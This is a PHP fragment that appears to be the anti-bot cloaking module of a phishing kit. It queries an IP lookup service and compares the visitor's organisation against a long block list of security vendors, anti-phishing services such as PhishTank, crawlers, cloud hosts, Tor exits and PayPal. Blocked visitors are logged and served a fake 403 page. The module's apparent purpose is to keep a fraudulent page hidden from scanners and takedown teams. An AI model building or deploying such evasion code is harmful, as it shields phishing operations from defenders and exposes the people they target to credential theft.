<?php

function getisp($ip) {
    $getip = 'http://extreme-ip-lookup.com/json/' . $ip;
    $curl     = curl_init();
    curl_setopt($curl, CURLOPT_URL, $getip);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
    $content = curl_exec($curl);
    curl_close($curl);
    $details   = json_decode($content);
    return $details->org;
}

$ispnya = getisp($ip2);

$banned_isp = array(
    '9New Network Inc',
'A100 ROW',
'Akamai',
'Amazon Technologies Inc.',
'Amazon',
'Amazon.com, Inc.',
'amazonaws',
'AntiVirus',
'antivirus',
'Apexis AG',
'Apexis',
'Apple Inc.',
'Art Matrix - Lightlink Inc.',
'AVAST Software s.r.o.',
'Avira',
'avirasoft',
'B2 Net Solutions',
'badware',
'Baidu',
'Barracuda Networks Inc.',
'Barracuda Networks',
'Barracuda',
'Bitdefender',
'Bitfolk',
'Blue Coat Systems',
'CachedNet',
'calyxinstitute',
'centralnic',
'Choopa',
'Cisco OpenDNS, LLC',
'Cisco Systems',
'clicktargetdevelopment.com',
'ClientID',
'CloudFlare',
'cloudflare',
'CloudVPN',
'ColoCrossing',
'colocrossing.com',
'ColoUp',
'Comodo',
'comodo',
'Complete Internet Access',
'Computer Problem Solving',
'cpanel66.proisp.no',
'crawl',
'crawler',
'Creative Thought Inc.',
'Customer Network',
'cyveillance',
'Daniel James Austin',
'DedFiberCo',
'Digital Domain',
'Digital Ocean',
'DigitalOcean',
'DIR A/S',
'DME Hosting LLC',
'Dosarrest',
'dreamhost',
'ebay',
'ebbs.healingpathsolutions.com',
'EGIHosting',
'Eircom Customer Assignment',
'enom',
'Enzu Inc',
'Eonix Corporation',
'eSecureData',
'ESET spol. s r.o.',
'exit0.liskov.tor-relays.net',
'exit-01a.noisetor.net',
'ExpressVPN',
'Facebook',
'Fastly',
'Fireeye',
'Flokinet',
'Fortinet',
'F3 Netze e.V.',
'Feral Hosting',
"Orange Polska Spolka Akcyjna",
"Bilink LLC",
'UBL Informationssysteme GmbH',
'Forcepoint, LLC',
'GANDI SAS',
'Global Perfomance',
'GoDaddy',
'GoDaddy.com, LLC',
'Google Inc.',
'Google LLC',
'Google',
'googleusercontent',
'LG DACOM Corporation',
'healingpathsolutions.com',
'Hetzner Online',
'HLL LLC',
'Hetzner Online GmbH',
'Host1Plus',
'Host Europe GmbH',
'Host Sailor Ltd.',
'Host',
'Hostalia',
'Hosteros LLC',
'Hosting Solution',
'Hosting',
'hosttech GmbH',
'HostUS',
'Hostwinds',
'Incapsula Inc',
'Infosphere',
'Inktomi Corporation',
'Instagram',
'Internap Network Services Corporation',
'Internet-Pro',
'Intersoft Internet',
'Involta',
'Iomart Hosting Ltd',
'IPVanish',
'IP Volume inc',
'Incrediserve LTD',
'Junk Email Filter Inc.',
'Kaspersky',
'Level 3 Communications',
'LG DACOM',
'Linode',
'Liquid Web',
'LogicWeb',
'london-tor.mooo.com',
'Long Thrive',
'LukMAN',
'Madgenius.com',
'Magticom Ltd',
'Mainloop',
'Master Internet',
'McAfee',
'Merit Network',
'Microsoft Corporation',
'Microsoft',
'Microsoft Limited UK',
'Microsoft Azure',
'Mozilla',
'msnbot',
'netcraft',
'netpilot',
'Next Layer Telekommunikationsdienstleistungs- und Beratungs GmbH',
'NForce Entertainment B.V.',
'Netprotect SRL',
'Nobis Technology Group',
'noisetor',
'noisetor.net',
'Online SAS',
'Oracle',
'Orange Polska Spolka Akcyjna',
'OVH SAS',
'OVH',
'ovh.net',
'p3pwgdsn',
'pacbell.net',
'Palo Alto Networks',
'PathsConnect',
'paypal',
'Peak 10',
'phishing',
'phishtank',
'phishtank.com',
'PHPNET Hosting Services',
'PIPEX-BLOCK1',
'PlusNet Technologies Ltd',
'Prescient Software',
'Private Customer',
'Private IP Address LAN',
'PrivateSystems Networks',
'proxy',
'PSINet Inc.',
'Psychz',
'Public facing services',
'QuadraNet',
'Quasi Networks LTD',
'Quintex Alliance Consulting',
'Rackspace',
'RamNode',
'Redpill Linpro AS',
'RedSwitches Pty',
'Return Path Inc.',
'rima-tde.net',
'roamsite.com',
'Scaleway',
'ScanSafe Services',
'Schulte Consulting LLC',
'Sectoor',
'Secure Internet',
'SecuredConnectivity.net',
'Security',
'Server Plan S.r.l.',
'Server',
'HETZNER',
'British Telecommunications PLC',
'M247 Europe SRL',
'Brookhaven National Laboratory',
'Digital Ocean',
'Simpli Networks LLC',
'SiteAdvisor',
'SoftLayer Technologies Inc.',
'SoftLayer Technologies',
'SoftLayer',
'softlayer',
'Solar VPS',
'Solution Pro',
'Sony',
'Servers.com, Inc.',
'Spark New Zealand Trading Ltd',
'spider.clicktargetdevelopment.com',
'Static IP Assignment',
'static.spro.net',
'sucuri.net',
'SunGard Availability Services LP',
'Sungard Network Solutions',
'SurfControl',
'SURFnet',
'Symantec',
'Team Technologies LLC',
'Tehnologii Budushego LLC',
'Telegram Messenger LLP',
'TerraTransit AG',
'tfbnw.net',
'The University of Tokyo',
'this.is.a.tor.exit-node.net',
'this.is.a.tor.node.xmission.com',
'Top Level Hosting SRL',
'tor-exit',
'tor-node.com',
'tor.piratenpartei-nrw.de',
'tor.tocici.com',
'torservers',
'Total Server Solutions',
'tpnet.pl',
'trendmicro',
'Trustwave Holdings Inc',
'trustwave',
'Twitter',
'UK Dedicated Servers Limited',
'Universidade Federal do Rio de Janeiro',
'University of Newcastle upon Tyne',
'University of Virginia',
'University of',
'University',
'Unus Inc.',
'Versaweb',
'VI Na Host Co. Ltd',
'Virtual1 Limited',
'VNET a.s.',
'Voxility',
'VPSmalaysia.com.my',
'vultr.com',
'Westnet',
'WhatsApp',
'Whitelabel IT Solutions Corp',
'Wintek Corporation',
'Wowrack.com',
'www16.mailshell.com',
'XO Communications',
'Xs4all Internet BV',
'Yahoo! Inc.',
'Mail.Ru LLC',
'Kvchosting.com LLC',
'OVH Hosting Oy',
'Yahoo',
'www.heficed.com',
'yahoo',
'Zayo Bandwidth',
'Zscaler',
);
    foreach ($banned_isp as $isps) {
        if (substr_count($ispnya, $isps) > 0) {
            $file = fopen("blockedisp.txt","a");
            fwrite($file," BLOCKED ISP || user-agent : ".$_SERVER['HTTP_USER_AGENT']."\n ip : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
             $click = fopen("totalisp_bot.txt","a");
            fwrite($click,"$ip (Detect by ISP)"."\n");
            fclose($click);
            header('HTTP/1.0 403 Forbidden');
    die('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You dont have permission to access / on this server.</p></body></html>');
            
        }
    }
 